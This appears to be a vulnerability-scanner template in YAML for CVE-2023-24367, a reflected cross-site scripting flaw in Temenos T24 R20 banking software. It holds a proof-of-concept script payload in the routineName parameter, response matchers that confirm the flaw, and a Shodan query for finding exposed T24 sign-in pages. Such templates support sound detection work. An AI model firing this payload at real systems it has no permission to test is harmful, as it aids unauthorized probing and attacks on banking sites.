34 lines
918 B
YAML
34 lines
918 B
YAML
|
id: CVE-2023-24367
|
||
|
|
||
|
info:
|
||
|
name: Temenos T24 R20 - Cross Site Scripting
|
||
|
author: r3Y3r53
|
||
|
severity: medium
|
||
|
description: |
|
||
|
Temenos T24 Release 20 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the routineName parameter at genrequest.jsp.
|
||
|
reference:
|
||
|
- https://github.com/mrojz/T24/blob/main/CVE-2023-24367.md
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-24367
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
shodan-query: title:"T24 Sign in"
|
||
|
tags: cve,cve2023,xss,temenos
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/jsps/genrequest.jsp?routineName="><script>alert(document.domain)</script>'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "<script>alert(document.domain)</script>"
|
||
|
- "<title>Processing...</title>"
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|